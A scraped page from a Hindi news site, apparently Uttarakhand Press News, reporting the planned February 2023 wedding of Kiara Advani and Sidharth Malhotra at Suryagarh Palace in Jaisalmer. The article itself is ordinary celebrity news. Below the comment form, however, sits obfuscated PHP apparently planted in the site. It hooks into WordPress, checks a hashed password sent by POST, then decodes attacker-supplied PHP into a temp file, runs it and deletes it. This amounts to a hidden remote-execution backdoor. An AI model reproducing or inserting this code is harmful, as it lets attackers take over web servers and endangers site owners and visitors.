शादी के लिए जैसलमेर में सबकुछ सेट , कियारा आडवाणी और सिद्धार्थ मल्होत्रा 6 फरवरी को एक-दूसरे के साथ जन्म-जन्म के बंधन में बंध जाएंगे

Uttarakhand Press News, 2 February 2023: बी-टाउन के सबसे चहेते लव बर्ड्स में से माने जाने वाले सिद्धार्थ मल्होत्रा और कियारा आडवाणी इस दिनों अपनी शादी की खबरों के चलते सुर्खियों में बने हुए हैं। अक्सर एक-दूसरे के साथ स्पॉट किए जाने वाले सिद्धार्थ और कियारा ने जहां अभी तक शादी की खबरों पर अपना रिएक्शन नहीं दिया है, वहीं उनकी वेडिंग को लेकर सोशल मीडिया पर तमाम अटकलें लगाई जा रही हैं। बीते काफी समय से अपनी शादी को लेकर चर्चा में बने हुए सिद्धार्थ और कियारा को लेकर अब जानकारी सामने आ रही है कि कपल की शादी की तैयारियां तेज हो गई हैं। नई रिपोर्ट्स के मुताबिक स्टार कपल आने वाली 6 तारीख को शादी करने वाला है। इसके साथ ही इस रिपोर्ट में और भी बहुत सी अहम जानकारी साझा की गई है, तो चलिए बताते हैं कि कियारा और सिद्धार्थ कब, कहां और कैसे एक-दूजे का हो की तैयारियों में जुटे हैं..

मीडिया रिपोर्ट्स के अनुसार, कियारा आडवाणी और सिद्धार्थ मल्होत्रा 6 फरवरी को एक-दूसरे के साथ जन्म-जन्म के बंधन में बंध जाएंगे। दोनों की शादी का जश्न, प्री-वेडिंग और पोस्ट वेडिंग फंक्शन 5 फरवरी से लेकर 8 फरवरी तक चलेंगे। सिद्धार्थ और कियारा के वेडिंग वेन्यू का भी खुलासा हो गया है। खबरों के अनुसार, दोनों जैसलमेर के सूर्यगढ़ पैलेस में सात फेरे लेंगे। शादी में 100 से 125 मेहमानों को इनवाइट किया गया है, जिसमें बी-टाउन की कई बड़ी हस्तियां शामिल हैं। दोनों की शादी में शाहरुख खान से लेकर करण जौहर तक के शामिल होने की उम्मीद की जा रही है। सिद्धार्थ और कियारा की शादी की हल्दी और संगीत सेरेमनी 6 फरवरी यानी शादी वाले दिन ही होगी।

इस रिपोर्ट में यह भी दावा किया जा रहा है कि कियारा और सिद्धार्थ की इस बिग फैट वेडिंग के लिए करीब 84 लग्जरी कमरे बुक किए गए हैं, जिनका हर दिन का किराया एक से दो करोड़ रुपये के करीब बताया जा रहा है। इसके साथ ही शादी में आने वाले मेहमानों के को लाने ले जाने के लिए 70 से ज्यादा लग्जरी गाड़ियां बुक की गई हैं। सिद्धार्थ और कियारा की शादी के लिए मेहमान 4 फरवरी से सूर्यगढ़ पैलेस पहुंचना शुरू कर देंगे। रिपोर्ट्स के मुताबिक, जैसलमेर में शादी के बाद कपल मुंबई में ग्रैंड वेडिंग रिसेप्शन रखेगा, जिसमें बॉलीवुड की तमाम हस्तियां शिरकत करेंगी। बता दें, हाल ही में कियारा को फैशन डिजाइनर मनीष मल्होत्रा के साथ स्पॉट किया गया। दोनों साथ में निकलते हैं और फिर अलग-अलग गाड़ियों में बैठकर चले जाते हैं। कियारा और मनीष को साथ देखने के बाद से ही शादी की खबरों को हवा मिल गई है। लोगों को मानना है कि कियारा अपनी शादी में मनीष मल्होत्रा का लहंगा ही पहनने वाली हैं।

कियारा और सिद्धार्थ की लव स्टोरी की बात करें तो कारगिल वॉर में शहीद हुए कैप्टन बत्रा के जीवन पर आधारित बायोपिक ‘शेरशाह’ में दोनों ने साथ में काम किया था। इस फिल्म में ऑन-स्क्रीन रोमांस करते-करते ऑफ स्क्रीन दोनों के रिश्ते को लेकर चर्चाएं होने लगी थीं। वहीं दोनों को पार्टीज से लेकर वेकेशन पर भी साथ में स्पॉट किया जाता है। फैंस भी दोनों को काफी पसंद करते हैं।

Read Previous

India vs New Zealand 3rd T20 : भारत-न्यूजीलैंड के बीच सीरीज का निर्णायक मुकाबला आज, दोनों टीमों के बीच कांटे की टक्कर

Read Next

ड्रोन्स और सेमीकंडक्टर मिलकर बनाएंगी भारत और अमेरिका की कंपनियां! मिलेगा जबरदस्त फायदा

Leave a Reply

Your email address will not be published. Required fields are marked *

if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}